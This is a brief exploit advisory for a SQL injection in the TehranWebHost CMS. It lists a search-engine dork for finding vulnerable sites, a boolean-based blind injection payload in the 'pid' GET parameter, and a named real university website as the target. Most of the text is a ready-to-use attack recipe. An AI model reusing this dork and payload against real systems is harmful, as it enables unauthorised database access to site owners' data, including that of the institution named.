[+] Exploit Title ; TehranWebHost cms sql injection vulnerability [+] Date : 2017-10-21 [+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : http://www.azarnetit.com/ [+] Dork : intext:"Powerd By: Azar Amytis Raham Group ©" inurl:php?id= [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Poc : [!] http://localhaost/path/page.php?id=categoryview&pid=sqli Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=11' AND 9455=9455 AND 'zOpF'='zOpF [+] Target : [!] http://or2012.azaruniv.ac.ir/farsi/page.php?pid=11